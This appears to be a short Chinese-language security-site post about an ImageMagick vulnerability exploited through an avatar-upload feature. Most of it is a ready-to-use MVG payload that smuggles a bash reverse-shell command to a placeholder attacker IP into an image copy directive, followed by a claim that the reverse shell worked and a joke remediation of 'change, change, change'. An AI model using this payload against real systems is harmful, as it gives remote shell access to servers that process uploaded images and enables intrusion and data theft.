最新的imagemagic的漏洞payload為
push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|bash -i >& /dev/tcp/【ip】/2333 0>&1"
pop graphic-context
在于修改頭像處
反彈shell成功
修復方案:
改改改
關于我們 | 聯系我們 | 廣告服務 | 投資合作 | 版權申明 | 在線幫助 | 網站地圖 | 作品發布 | Vip技術培訓 | 舉報中心
版權所有: 紅黑聯盟--致力于做實用的IT技術學習網站